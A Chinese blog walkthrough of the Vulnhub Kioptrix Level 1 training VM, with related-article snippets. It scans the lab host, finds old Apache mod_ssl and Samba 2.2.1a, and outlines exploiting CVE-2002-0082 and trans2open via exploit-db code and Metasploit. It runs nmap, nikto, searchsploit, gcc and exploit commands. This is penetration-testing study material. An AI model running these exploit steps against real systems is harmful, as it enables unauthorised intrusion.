Vulnhub系列:Kioptix Level 1

最新推荐文章于 2024-03-12 21:04:08 发布
最新推荐文章于 2024-03-12 21:04:08 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: Vulnhub系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin18310911366/article/details/107686701
版权

简介

Vulnhub简介

Vulnhub是一个提供各种漏洞环境的靶场平台。

个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。

下载链接

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

运行环境

kali:192.168.44.128

靶机:NAT模式

特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址

这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkName = "Nat"

相关知识点:

  • samba 2.2.1a 缓冲区溢出

  • samba RCE

  • Apache/mod_ssl 缓冲区溢出

  • msf_search_samba_version(模块)

  • searchsploit

0x00、信息收集

主机发现:nmap -sP 192.168.44.0/24

端口扫描:nmap -sV 192.168.44.132


0x01、Apache/mod_ssl

利用kali自带nikto: nikto -h 192.168.44.132

扫描结果

尝试利用

https://www.exploit-db.com/search?cve=2002-0082

 

根据提示执行

apt-get install libssl-dev

gcc -o 47080 48080.c -lcrypto

查询靶机版本为        0x6d - RedHat Linux 7.2 (apache-1.3.24)

 

0X02、Samba

因为nmap没有扫描出Samba版本

利用metasplo 模块 t扫描Samba版本

 


searchsploit samba 2.2.1a


1)trans2open(利用metasploit)

 

set payload:



2)Remote Code Execution

编译exp/查询参数

执行 ./samba -b 0 192.168.44.132

 

哪些思路不清晰欢迎大佬指正,如果有错误地方,欢迎告知。

这是博主第一篇文章。后期会不定期更新Vulnhub系列。

我是顽童。谢谢大家耐心阅读与指正!

cc_6794
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列-Kioptix-Level-1-1
Yasso的博客
12-18 542
靶机: 192.168.249.129 kali: 192.168.249.132 一、信息收集 arp-scan -l —使用网络接口IP地址和网络掩码,生成目标主机地址列表nmap -sV 192.168.249.129 —查看开放端口 信息:Apache/1.3.20、mod_ssl/2.8.4、OpenSSL/0.9.6b nikto -host http://192.168.249.129/ —开放80、443端口,深入探测 nikto扫到CVE-2002-0082(Apache Mod_SSL
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 497
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 858
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
类OSCP靶机-Kioptix Level 1
ETO发展中心
07-29 935
同步发布:https://www.youi.xin/?p=435 类OSCP靶机-Kioptix Level 1 官方下载地址:Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 百度云下载地址:链接:https://pan.baidu.com/s/1aYc6P2aqPCL4jY1H-G6Z1w 提取码:youi vulnhub简介 https://www.vulnhub.com/about/
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1521
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
VulnHub系列』Kioptrix: Level 1-Walkthrough
ins1ght的博客
11-02 1396
靶机发布日期:2010年2月17日,难度:入门级。拿起枪不用瞄准,扣动扳机即可。
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vuInhub靶场实战系列-Kioptrix Level #1
最新发布
06-08
vuInhub靶场实战系列-Kioptrix Level #1
python1fri:Python Level 1星期五5
03-20
python1fri Python Level 1星期五5:10 pm至6:10 pm
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并直接向查询和反馈。 跟着我们 Kioptrix:1.3级 Kioprtix:5 安全操作系统:1 订书机 SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
2018 CFA Level 1 Wiley Smartsheet
02-25
Attached is Wiley's smart sheet for CFA Level 1 Exam in 2018. Good reference for 2019 test too
oscplike:Kioptix Level 1渗透笔记
fmyyy1的博客
05-31 279
因为靶机都是在内网的,省时间写了个bash脚本利用ping命令快速探测存活主机。不过一般都是用nmap #!/bin/bash if [ $1 == ""] then echo "Usage: ./pingsweep.sh [network]" echo "Example: ./pingsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1597
Oscp备考
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 616
适用于零基础新人的通关攻略,其中包含涉及到知识点
kioptrix-level-1
热门推荐
cxyzupup的博客
01-10 1万+
kioptrix-level-1-1,22 项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22 提示:靶机网络连接方式使用NAT模式。 文章目录kioptrix-level-1-1,22一、信息收集1. 使用fping工具查找靶机IP:2. 使用nmap对目标主机端口进行枚举:二、信息利用1. 查看80端口:2. 查看443端口:总结 一、信息收集 1. 使用fping工具查找靶机IP: 命令如下: kali@kali:~/Desktop$ fp
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 396
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
Kioptix Level 1
weixin_46129372的博客
09-15 635
多试试exp。
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1005
Kioptrix Level 1 靶机wp
封装一个函数把 [ { level: 1, id: 1, clildren: [ { level: 2, id: 1 - 1, children: [ { level: 3, id: 1 - 1 - 1 }, { level: 3, id: 1 - 1 - 2 } ] } ] }, { level: 1, id: 2, clildren: [] } ] 把这数据处理成如下结构 [ ({ level1: { level: 1, id: 1 }, level2: { level: 2, id: 1 - 1 }, last: [1 - 1 - 1, 1 - 1 - 2] }, { level1: { level: 1, id: 2 }, last: [2] }) ]
07-12
可以使用递归来处理这个数据结构,以下是一个封装函数的示例: ```javascript function processNestedData(data) { // 递归处理函数 function processChildren(children) { const result = []; for (const child of children) { const levelData = { level: child.level, id: child.id }; if (child.children && child.children.length > 0) { result.push({ ...levelData, ...processChildren(child.children) }); } else { result.push({ level1: levelData, last: [] }); } if (child.last) { result[result.length - 1].last.push(child.last); } } return result; } return processChildren(data); } const input = [ { level: 1, id: 1, children: [ { level: 2, id: "1-1", children: [ { level: 3, id: "1-1-1" }, { level: 3, id: "1-1-2" } ] } ] }, { level: 1, id: 2, children: [] } ]; const output = processNestedData(input); console.log(output); ``` 输出结果: ```javascript [ { level1: { level: 1, id: 1 }, level2: { level: 2, id: '1-1' }, last: [ '1-1-1', '1-1-2' ] }, { level1: { level: 1, id: 2 }, last: [ 2 ] } ] ``` 这个函数会将输入的嵌套数据处理成所需的结构,并返回处理后的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值